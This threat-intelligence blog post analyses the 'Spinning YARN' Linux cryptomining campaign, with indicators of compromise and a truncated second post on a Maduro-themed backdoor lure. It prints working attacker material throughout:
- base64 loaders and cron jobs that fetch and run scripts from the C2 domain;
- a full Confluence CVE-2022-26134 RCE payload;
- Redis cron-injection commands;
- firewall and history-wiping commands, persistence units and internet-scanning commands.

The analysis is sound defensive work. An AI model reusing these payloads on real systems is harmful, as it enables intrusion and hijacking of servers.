Blog
/
/
June 3, 2024

Spinning YARN: A New Linux Malware Campaign Targets Docker, Apache Hadoop, Redis and Confluence

Cado Security labs researchers (now part of Darktrace) encountered a Linux malware campaign, "Spinning YARN," that targets Docker, Apache Hadoop, Redis, and Confluence. This campaign exploits vulnerabilities in these widely used platforms to gain access.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
03
Jun 2024

Introduction: Linux malware campaign

Researchers from Cado Security Labs (now part of Darktrace) have encountered an emerging malware campaign targeting misconfigured servers running the following web-facing services:

The campaign utilizes a number of unique and unreported payloads, including four Golang binaries, that serve as tools to automate the discovery and infection of hosts running the above services. The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an n-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts. 

Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell and enable persistent access to the compromised hosts. 

As always, it’s worth stressing that without the capabilities of governments or law enforcement agencies, attribution is nearly impossible – particularly where shell script payloads are concerned. However, it’s worth noting that the shell script payloads delivered by this campaign bear resemblance to those seen in prior cloud attacks, including those attributed to TeamTNT and WatchDog, along with the Kiss a Dog campaign reported by Crowdstrike. [3] 

Summary:

  • Four novel Golang payloads have been discovered that automate the identification and exploitation of Docker, Hadoop YARN, Confluence and Redis hosts
  • Attackers deploy an exploit for CVE-2022-26134, an n-day vulnerability in Confluence which is used to conduct RCE attacks [4]
  • For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host
  • The attackers also deploy an instance of the Platypus open-source reverse shell utility, to maintain access to the host [5]
  • Multiple user mode rootkits are deployed to hide malicious processes

Initial access

Cado Security Labs researchers first discovered this campaign after being alerted to a cluster of initial access activity on a Docker Engine API honeypot. A Docker command was received from the IP address 47[.]96[.]69[.]71 that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server’s root directory (/) to the mount point /mnt within the container itself. 

This technique is fairly common in Docker attacks, as it allows the attacker to write files to the underlying host. Typically, this is exploited to write out a job for the Cron scheduler to execute, essentially conducting a remote code execution (RCE) attack. 
In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

Wireshark output
Figure 1: Wireshark output demonstrating Docker communication, including Initial Access commands 

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker’s Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilize the vurl executable to retrieve the first stage payload from the C2 server located at http[:]//b[.]9-9-8[.]com which, at the time of the attack, resolved to the IP 107[.]189[.]31[.]172.

echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsICRACg== |base64 -d    

     \u003e/usr/bin/vurl \u0026\u0026 chmod +x /usr/bin/vurl;echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' \u003e/etc/crontab \u0026\u0026 echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' \u003e/etc/cron.d/zzh \u0026\u0026 echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d \u003e\u003e/etc/crontab" 

Payload retrieval commands written out to the Docker host

echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d 

    vurl http[:]//b[.]9-9-8[.]com/brysj/cronb.sh 

Contents of first Cron job decoded

To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh.

KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d 

    * * * * * root python -c "import urllib2; print urllib2.urlopen('http://b.9\-9\-\8.com/t.sh').read()" >.1;chmod +x .1;./.1 

Contents of the second Cron job decoded

Unfortunately, Cado Security Labs researchers were unable to retrieve this additional payload. It is assumed that it serves a similar purpose to the cronb.sh script discussed in the next section, and is likely a variant that carries out the same attack without relying on vurl. 

It’s worth noting that based on the decoded commands above, t.sh appears to reside outside the web directory that the other files are served from. This could be a mistake on the part of the attacker, perhaps they neglected to include that fragment of the URL when writing the Cron job.

Primary payload: cronb.sh

cronb.sh is a fairly straightforward shell script, its capabilities can be summarized as follows:

  • Define the C2 domain (http[:]//b[.]9-9-8[.]com) and URL (http[:]//b[.]9-9-8[.]com/brysj) where additional payloads are located 
  • Check for the existence of the chattr utility and rename it to zzhcht at the path in which it resides
  • If chattr does not exist, install it via the e2fsprogs package using either the apt or yum package managers before performing the renaming described above
  • Determine whether the current user is root and retrieve the next payload based on this
... 
    if [ -x /bin/chattr ];then 
        mv /bin/chattr /bin/zzhcht 
    elif [ -x /usr/bin/chattr ];then 
        mv /usr/bin/chattr /usr/bin/zzhcht 
    elif [ -x /usr/bin/zzhcht ];then 
        export CHATTR=/usr/bin/zzhcht 
    elif [ -x /bin/zzhcht ];then 
        export CHATTR=/bin/zzhcht 
    else  
       if [ $(command -v yum) ];then  
            yum -y reinstall e2fsprogs 
            if [ -x /bin/chattr ];then 
               mv /bin/chattr /bin/zzhcht 
       elif [ -x /usr/bin/chattr ];then 
               mv /usr/bin/chattr /usr/bin/zzhcht 
            fi 
       else 
            apt-get -y reinstall e2fsprogs 
            if [ -x /bin/chattr ];then 
              mv /bin/chattr /bin/zzhcht 
      elif [ -x /usr/bin/chattr ];then 
              mv /usr/bin/chattr /usr/bin/zzhcht 
            fi 
       fi 
    fi 
    ... 

Snippet of cronb.sh demonstrating chattr renaming code

ar.sh

This much longer shell script prepares the system for additional compromise, performs anti-forensics on the host and retrieves additional payloads, including XMRig and an attacker-generated script that continues the infection chain.

In a function named check_exist(), the malware uses netstat to determine whether connections to port 80 outbound are established. If an established connection to this port is discovered, the malware prints miner running to standard out. Later code suggests that the retrieved miner communicates with a mining pool on port 80, indicating that this is a check to determine whether the host has been previously compromised.

ar.sh will then proceed to install a number of utilities, including masscan, which is used for host discovery at a later stage in the attack. With this in place, the malware proceeds to run a number of common system weakening and anti-forensics commands. These include disabling firewalld and iptables, deleting shell history (via the HISTFILE environment variable), disabling SELinux and ensuring outbound DNS requests are successful by adding public DNS servers to /etc/resolv.conf.

Interestingly, ar.sh makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker’s session from being appended to the history file. [6] This is achieved with the following command:

shopt -ou history 2>/dev/null 1>/dev/null

Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn’t appear in the shell history once a new session has been spawned. This is an effective anti-forensics technique for shell script malware, one that Cado Security Labs researchers have yet to see in other campaigns.

env_set(){ 
    iptables -F 
    systemctl stop firewalld 2>/dev/null 1>/dev/null 
    systemctl disable firewalld 2>/dev/null 1>/dev/null 
    service iptables stop 2>/dev/null 1>/dev/null 
    ulimit -n 65535 2>/dev/null 1>/dev/null 
    export LC_ALL=C  
    HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null 
    export HISTFILE=/dev/null 2>/dev/null 1>/dev/null 
    unset HISTFILE 2>/dev/null 1>/dev/null 
    shopt -ou history 2>/dev/null 1>/dev/null 
    set +o history 2>/dev/null 1>/dev/null 
    HISTSIZE=0 2>/dev/null 1>/dev/null 
    export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games 
    setenforce 0 2>/dev/null 1>/dev/null 
    echo SELINUX=disabled >/etc/selinux/config 2>/dev/null 
    sudo sysctl kernel.nmi_watchdog=0 
    sysctl kernel.nmi_watchdog=0 
    echo '0' >/proc/sys/kernel/nmi_watchdog 
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 
    grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; 
    grep -q 114.114.114.114 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; 
    } 

System weakening commands from ar.sh – env_set() function

Following the above techniques, ar.sh will proceed to install the libprocesshider and diamorphine user mode rootkits and use these to hide their malicious processes [7][8]. The rootkits are retrieved from the attacker’s C2 server and compiled on delivery. The use of both libprocesshider and diamorphine is particularly common in cloud malware campaigns and was most recently exhibited by a Redis miner discovered by Cado Security Labs in February 2024. [9].

Additional system weakening code in ar.sh focuses on uninstalling monitoring agents for Alibaba Cloud and Tencent, suggesting some targeting of these cloud environments in particular. Targeting of these East Asian cloud providers has been observed previously in campaigns by the threat actor WatchDog [10].

Other notable capabilities of ar.sh include: 

  • Insertion of an attacker-controlled SSH key, to maintain access to the compromised host
  • Retrieval of the miner binary (a fork of XMRig), this is saved to /var/tmp/.11/sshd
  • Retrieval of bioset, an open source Golang reverse shell utility, named Platypus, saved to /var/tmp/.11/bioset [5]
  • The bioset payload was intended to communicate with an additional C2 server located at 209[.]141[.]37[.]110:14447, communication with this host was unsuccessful at the time of analysis
  • Registering persistence in the form of systemd services for both bioset and the miner itself
  • Discovery of SSH keys and related IPs
  • The script also attempts to spread the cronb.sh malware to these discovered IPs via a SSH remote command
  • Retrieval and execution of a binary executable named fkoths (discussed in a later section)
... 
            ${CHATTR} -ia /etc/systemd/system/sshm.service && rm -f /etc/systemd/system/sshm.service 
    cat >/tmp/ext4.service << EOLB 
    [Unit] 
    Description=crypto system service 
    After=network.target 
    [Service] 
    Type=forking 
    GuessMainPID=no 
    ExecStart=/var/tmp/.11/sshd 
    WorkingDirectory=/var/tmp/.11 
    Restart=always 
    Nice=0  
    RestartSec=3 
    [Install] 
    WantedBy=multi-user.target 
    EOLB 
    fi 
    grep -q '/var/tmp/.11/bioset' /etc/systemd/system/sshb.service 
    if [ $? -eq 0 ] 
    then  
            echo service exist 
    else 
            ${CHATTR} -ia /etc/systemd/system/sshb.service && rm -f /etc/systemd/system/sshb.service 
    cat >/tmp/ext3.service << EOLB 
    [Unit] 
    Description=rshell system service 
    After=network.target 
    [Service] 
    Type=forking 
    GuessMainPID=no 
    ExecStart=/var/tmp/.11/bioset 
    WorkingDirectory=/var/tmp/.11 
    Restart=always 
    Nice=0  
    RestartSec=3 
    [Install] 
    WantedBy=multi-user.target 
    EOLB 
    fi 
    ... 

Examples of systemd service creation code for the miner and bioset binaries

Finally, ar.sh creates an infection marker on the host in the form of a simple text file located at /var/tmp/.dog. The script first checks that the /var/tmp/.dog file exists. If it doesn’t, the file is created and the string lockfile is echoed into it. This serves as a useful detection mechanism to determine whether a host has been compromised by this campaign. 

Finally, ar.sh concludes by retrieving s.sh from the C2 server, using the vurl function once again.

fkoths

This payload is the first of several 64-bit Golang ELFs deployed by the malware. The functionality of this executable is incredibly straightforward. Besides main(), it contains two additional functions named DeleteImagesByRepo() and AddEntryToHost(). 

DeleteImagesByRepo() simply searches for Docker images from the Ubuntu or Alpine repositories, and deletes those if found. Go’s heavy use of the stack makes it somewhat difficult to determine which repositories the attackers were targeting based on static analysis alone. Fortunately, this becomes evident when monitoring the stack in a debugger.

Example stack contents
Figure 2: Example stack contents when DeleteImagesByRepo() is called

It’s clear from the initial access stage that the attackers leverage the alpine:latest image to initiate their attack on the host. Based on this, it’s been assessed with high confidence that the purpose of this function is to clear up any evidence of this initial access, essentially performing anti-forensics on the host. 

The AddEntryToHost() function, as the name suggests, updates the /etc/hosts file with the following line:

127.0.0.1 registry-1.docker.io 

This has the effect of “blackholing” outbound requests to the Docker registry, preventing additional container images from being pulled from Dockerhub. This same technique was observed recently by Cado Security Labs researchers in the Commando Cat campaign [11].

s.sh

The next stage in the infection chain is the execution of yet another shell script, this time used to download additional binary payloads and persist them on the host. Like the scripts before it, s.sh begins by defining the C2 domain (http[:]//b[.]9-9-8[.]com), using a base64-encoded string. The malware then proceeds to create the following directory structure and changing directory into it: /etc/…/.ice-unix/. 

Within the .ice-unix directory, the attacker creates another infection marker on the host, this time in a file named .watch. If the file doesn’t already exist, the script will create it and echo the integer 1 into it. Once again, this serves as a useful detection mechanism for determining whether your host has been compromised by this campaign.

With this in place, the malware proceeds to install a number of packages via the apt or yum package managers. Notable packages include:

  • build-essential
  • gcc
  • redis-server
  • redis-tools
  • redis
  • unhide
  • masscan
  • docker.io
  • libpcap (a dependency of pnscan)

From this, it is believed that the attacker intends to compile some code on delivery, interact with Redis, conduct Internet scanning with masscan and interact with Docker. 

With the package installation complete, s.sh proceeds to retrieve zgrab and pnscan from the C2 server, these are used for host discovery in a later stage. The script then proceeds to retrieve the following executables:

  • c.sh – saved as /etc/.httpd/.../httpd
  • d.sh – saved as /var/.httpd/.../httpd
  • w.sh – saved as /var/.httpd/..../httpd
  • h.sh – saved as var/.httpd/...../httpd

s.sh then proceeds to define systemd services to persistently launch the retrieved executables, before saving them to the following paths:

  • /etc/systemd/system/zzhr.service (c.sh)
  • /etc/systemd/system/zzhd.service (d.sh)
  • /etc/systemd/system/zzhw.service (w.sh)
  • /etc/systemd/system/zzhh.service (h.sh)

... 
    if [ ! -f /var/.httpd/...../httpd ];then 
        vurl $domain/d/h.sh > httpd 
        chmod a+x httpd 
        echo "FUCK chmod2" 
        ls -al /var/.httpd/..... 
    fi 
    cat >/tmp/h.service <<EOL 
    [Service] 
    LimitNOFILE=65535 
    ExecStart=/var/.httpd/...../httpd 
    WorkingDirectory=/var/.httpd/..... 
    Restart=always  
    RestartSec=30 
    [Install] 
    WantedBy=default.target 
    EOL 
    ... 

Example of payload retrieval and service creation code for the h.sh payload

Initial access and spreader utilities: h.sh, d.sh, c.sh, w.sh

In the previous stage, the attacker retrieves and attempts to persist the payloads c.sh, d.sh, w.sh and h.sh. These executables are dedicated to identifying and exploiting hosts running each of the four services mentioned previously. 

Despite their names, all of these payloads are 64-bit Golang ELF binaries. Interestingly, the malware developer neglected to strip the binaries, leaving DWARF debug information intact. There has been no effort made to obfuscate strings or other sensitive data within the binaries either, making them trivial to reverse engineer. 

The purpose of these payloads is to use masscan or pnscan (compiled on delivery in an earlier stage) to scan a randomized network segment and search for hosts with ports 2375, 8088, 8090 or 6379 open. These are default ports used by the Docker Engine API, Apache Hadoop YARN, Confluence and Redis respectively. 

h.sh, d.sh and w.sh contain identical functions to generate a list of IPs to scan and hunt for these services. First, the Golang time_Now() function is called to provide a seed for a random number generator. This is passed to a function generateRandomOctets() that’s used to define a randomised /8 network prefix to scan. Example values include:

  • 109.0.0.0/8
  • 84.0.0.0/8
  • 104.0.0.0/8
  • 168.0.0.0/8
  • 3.0.0.0/8
  • 68.0.0.0/8

For each randomized octet, masscan is invoked and the resulting IPs are written out to the file scan_<octet>.0.0.0_8.txt in the working directory. 

d.sh

disassembly demonstrating use of os/exec to run massan
Figure 3: Disassembly demonstrating use of os/exec to run masscan

For d.sh, this procedure is used to identify hosts with the default Docker Engine API port (2375) open. The full masscan command is as follows:

masscan <octet>.0.0.0/8 -p 2375 –rate 10000 -oL scan_<octet>.0.0.0_8.txt 

The masscan output file is then read and the list of IPs is converted into a format readable by zgrab, before being written out to the file ips_for_zgrab_<octet>.txt [12].

For d.sh, zgrab will read these IPs and issue a HTTP GET request to the /v1.16/version endpoint of the Docker Engine API. The zgrab command in its entirety is as follows:

zgrab --senders 5000 --port=2375 --http='/v1.16/version' --output-file=zgrab_output_<octet>.0.0.0_8.json`  < ips_for_zgrab_<octet>.txt 2>/dev/null 

Successful responses to this HTTP request let the attacker know that Docker Engine is indeed running on port 2375 for the IP in question. The list of IPs to have responded successfully is then written out to zgrab_output_<octet>.0.0.0_8.json. 

Next, the payload calls a function helpfully named executeDockerCommand() for each of the IPs discovered by zgrab. As the name suggests, this function executes the Docker command covered in the Initial Access section above, kickstarting the infection chain on a new vulnerable host. 

Decompiler output demonstrating Docker command construction routine
Figure 4: Decompiler output demonstrating Docker command construction routine

h.sh

This payload contains identical logic for the randomized octet generation and follows the same procedure of using masscan and zgrab to identify targets. The main difference in this payload’s discovery phase is the targeting of Apache Hadoop servers, rather than Docker Engine deployments. As a result, the masscan and zgrab commands are slightly different:

masscan <octet>.0.0.0/8 -p 8088 –rate 10000 -oL scan_<octet>.0.0.0_8.txt 
zgrab --senders 1000 --port=8088 --http='/stacks' --output-file=zgrab_output_<octet>.0.0.0_8.json` < ips_for_zgrab_<octet>.txt 2>/dev/null 

From this, we can determine that d.sh is a Docker discovery and initial access tool, whereas h.sh is an Apache Hadoop discovery and initial access tool. 

Instead of invoking the executeDockerCommand() function, this payload instead invokes a function named executeYARNCommand() to handle the interaction with Hadoop. Similar to the Docker API interaction described previously, the purpose of this is to target Apache Hadoop YARN, a component of Hadoop that is responsible for scheduling tasks within the cluster [1].

If the YARN API is exposed to the open Internet, it’s possible to conduct a RCE attack by sending a JSON payload in a HTTP POST request to the /ws/v1/cluster/apps/ endpoint. This method of conducting RCE has been leveraged previously to deliver cloud-focused malware campaigns, such as Kinsing [13].

Example of YARN HTTP POST generation pseudocode in h.sh
Figure 5: Example of YARN HTTP POST generation pseudocode in h.sh

The POST request contains a JSON body with the same base64-encoded initial access command we covered previously. The JSON payload defines a new application (task to be scheduled, in this case a shell command) with the name new-application. This shell command decodes the base64 payload that defines vurl and retrieves the first stage of the infection chain. 

Success in executing this command kicks off the infection once again on a Hadoop host, allowing the attackers persistent access and the ability to run their XMRig miner.

w.sh 

This executable repeats the discovery procedure outlined in the previous two initial access/discovery payloads, except this time the target port is changed to 8090 – the default port used by Confluence. [2]

For each IP discovered, the malware uses zgrab to issue a HTTP GET request to the root directory of the server. This request includes a URI containing an exploit for CVE-2022-26134, a vulnerability in the Confluence server that allows attackers to conduct RCE attacks. [4]  

As you might expect, this RCE is once again used to execute the base64-encoded initial access command mentioned previously.

Decompiler output displaying CVE-2022-26134 exploit code
Figure 6: Decompiler output displaying CVE-2022-26134 exploit code

Without URL encoding, the full URI appears as follows:

/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}/ 

c.sh 

This final payload is dedicated to exploiting misconfigured Redis deployments. Of course, targeting of Redis is incredibly common amongst cloud-focused threat actors, making it unsurprising that Redis would be included as one of the four services targeted by this campaign [9].

This sample includes a slightly different discovery procedure from the previous three. Instead of using a combination of zgrab and masscan to identify targets, c.sh opts to execute pnscan across a range of randomly-generated IP addresses. 

After execution, the malware sets the maximum number of open files to 5000 via the setrlimit() syscall, before proceeding to delete a file named .dat in the current working directory, if it exists. If the file doesn’t exist, the malware creates it and writes the following redis-cli commands to it, in preparation for execution on identified Redis hosts:

save 
    config set stop-writes-on-bgsave-error no 
    flushall 
    set backup1 "\n\n\n\n*/2 * * * * echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash \n\n\n" 
    set backup2 "\n\n\n\n*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup3 "\n\n\n\n*/4 * * * * echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup4 "\n\n\n\n@hourly  python -c \"import urllib2; print urllib2.urlopen(\'http://b.9\-9\-8\.com/t.sh\').read()\" >.1;chmod +x .1;./.1 \n\n\n" 
    config set dir "/var/spool/cron/" 
    config set dbfilename "root" 
    save 
    config set dir "/var/spool/cron/crontabs" 
    save 
    flushall 
    set backup1 "\n\n\n\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash \n\n\n" 
    set backup2 "\n\n\n\n*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup3 "\n\n\n\n*/4 * * * * root echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup4 "\n\n\n\n@hourly  python -c \"import urllib2; print urllib2.urlopen(\'http://b.9\-9\-8\.com/t.sh\').read()\" >.1;chmod +x .1;./.1 \n\n\n" 
    config set dir "/etc/cron.d" 
    config set dbfilename "zzh" 
    save 
    config set dir "/etc/" 
    config set dbfilename "crontab" 
    save 

This achieves RCE on infected hosts, by writing a Cron job including shell commands to retrieve the cronb.sh payload to the database, before saving the database file to one of the Cron directories. When this file is read by the scheduler, the database file is parsed for the Cron job, and the job itself is eventually executed. This is a common Redis exploitation technique, covered extensively by Cado in previous blogs [9].

After running the random octet generation code described previously, the malware then uses pnscan to attempt to scan the randomized /16 subnet and identify misconfigured Redis servers. The pnscan command is as follows:

/usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 221.0.0.0/16 6379 
  • The -t argument enforces a timeout of 512 milliseconds for outbound connections
  • The -R argument looks for a specific hex-encoded response from the target server, in this case s:Linux (note that this is likely intended to be os:Linux)
  • The -W argument is a hex-encoded request string to send to the server. This runs the command 1; $4; info against the Redis host, prompting it to return the banner info searched for with the -R argument
pnsan command construction and execution
Figure 7: Disassembly demonstrating pnscan command construction and execution

For each identified IP, the following Redis command is run:

redis-cli -h <IP address> -p <port> –raw <content of .dat> 

Of course, this has the effect of reading the redis-cli commands in the .dat file and executing them on discovered hosts.

Conclusion

This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers. Attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments. 

Docker Engine API endpoints are frequently targeted for initial access. In the first quarter of 2024 alone, Cado Security Labs researchers have identified three new malware campaigns exploiting Docker for initial access, including this one. [11, 14] The deployment of an n-day vulnerability against Confluence also demonstrates a willingness to weaponize security research for nefarious purposes.

Although it’s not the first time Apache Hadoop has been targeted, it’s interesting to note that attackers still find the big data framework a lucrative target. It’s unclear whether the decision to target Hadoop in addition to Docker is based on the attacker’s experience or knowledge of the target environment.

Indicators of compromise

Filename SHA256

cronb.sh d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e

ar.sh 64d8f887e33781bb814eaefa98dd64368da9a8d38bd9da4a76f04a23b6eb9de5

fkoths afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf2de9fe975cae50c4

s.sh 251501255693122e818cadc28ced1ddb0e6bf4a720fd36dbb39bc7dedface8e5

bioset 0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d6af01a948caf8b87

d.sh 0c3fe24490cc86e332095ef66fe455d17f859e070cb41cbe67d2a9efe93d7ce5

h.sh d45aca9ee44e1e510e951033f7ac72c137fc90129a7d5cd383296b6bd1e3ddb5

w.sh e71975a72f93b134476c8183051fee827ea509b4e888e19d551a8ced6087e15c

c.sh 5a816806784f9ae4cb1564a3e07e5b5ef0aa3d568bd3d2af9bc1a0937841d174

Paths

/usr/bin/vurl

/etc/cron.d/zzh

/bin/zzhcht

/usr/bin/zzhcht

/var/tmp/.11/sshd

/var/tmp/.11/bioset

/var/tmp/.11/..lph

/var/tmp/.dog

/etc/systemd/system/sshm.service

/etc/systemd/system/sshb.service

/etc/systemd/system/zzhr.service

/etc/systemd/system/zzhd.service

/etc/systemd/system/zzhw.service

/etc/systemd/system/zzhh.service

/etc/…/.ice-unix/

/etc/…/.ice-unix/.watch

/etc/.httpd/…/httpd

/etc/.httpd/…/httpd

/var/.httpd/…./httpd

/var/.httpd/…../httpd

IP addresses

47[.]96[.]69[.]71

107[.]189[.]31[.]172

209[.]141[.]37[.]110

Domains/URLs

http[:]//b[.]9-9-8[.]com

http[:]//b[.]9-9-8[.]com/brysj/cronb.sh

http[:]//b[.]9-9-8[.]com/brysj/d/ar.sh

http[:]//b[.]9-9-8[.]com/brysj/d/c.sh

http[:]//b[.]9-9-8[.]com/brysj/d/h.sh

http[:]//b[.]9-9-8[.]com/brysj/d/d.sh

http[:]//b[.]9-9-8[.]com/brysj/d/enbio.tar

References:

  1. https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/YARN.html
  2. https://www.atlassian.com/software/confluence
  3. https://www.crowdstrike.com/en-us/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/
  4. https://nvd.nist.gov/vuln/detail/cve-2022-26134
  5. https://github.com/WangYihang/Platypus
  6. https://www.gnu.org/software/bash/manual/html_node/The-Shopt-Builtin.html
  7. https://github.com/gianlucaborello/libprocesshider
  8. https://github.com/m0nad/Diamorphine
  9. https://www.darktrace.com/blog/migo-a-redis-miner-with-novel-system-weakening-techniques
  10. https://www.cadosecurity.com/blog/watchdog-continues-to-target-east-asian-csps
  11. https://www.darktrace.com/blog/the-nine-lives-of-commando-cat-analyzing-a-novel-malware-campaign-targeting-docker
  12. https://github.com/zmap/zgrab2
  13. https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html
  14. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community

More in this series

No items found.

Blog

/

Network

/

January 9, 2026

Maduro Arrest Used as a Lure to Deliver Backdoor

maduro arrest used as lure to deliver backdoorDefault blog imageDefault blog image

Introduction

Threat actors frequently exploit ongoing world events to trick users into opening and executing malicious files. Darktrace security researchers recently identified a threat group using reports around the arrest of Venezuelan President Nicolàs Maduro on January 3, 2025, as a lure to deliver backdoor malware.

Technical Analysis

While the exact initial access method is unknown, it is likely that a spear-phishing email was sent to victims, containing a zip archive titled “US now deciding what’s next for Venezuela.zip”. This file included an executable named “Maduro to be taken to New York.exe” and a dynamic-link library (DLL), “kugou.dll”.  

The binary “Maduro to be taken to New York.exe” is a legitimate binary (albeit with an expired signature) related to KuGou, a Chinese streaming platform. Its function is to load the DLL “kugou.dll” via DLL search order. In this instance, the expected DLL has been replaced with a malicious one with the same name to load it.  

DLL called with LoadLibraryW.
Figure 1: DLL called with LoadLibraryW.

Once the DLL is executed, a directory is created C:\ProgramData\Technology360NB with the DLL copied into the directory along with the executable, renamed as “DataTechnology.exe”. A registry key is created for persistence in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Lite360” to run DataTechnology.exe --DATA on log on.

 Registry key added for persistence.
Figure 2. Registry key added for persistence.
Folder “Technology360NB” created.
Figure 3: Folder “Technology360NB” created.

During execution, a dialog box appears with the caption “Please restart your computer and try again, or contact the original author.”

Message box prompting user to restart.
Figure 4. Message box prompting user to restart.

Prompting the user to restart triggers the malware to run from the registry key with the command --DATA, and if the user doesn't, a forced restart is triggered. Once the system is reset, the malware begins periodic TLS connections to the command-and-control (C2) server 172.81.60[.]97 on port 443. While the encrypted traffic prevents direct inspection of commands or data, the regular beaconing and response traffic strongly imply that the malware has the ability to poll a remote server for instructions, configuration, or tasking.

Conclusion

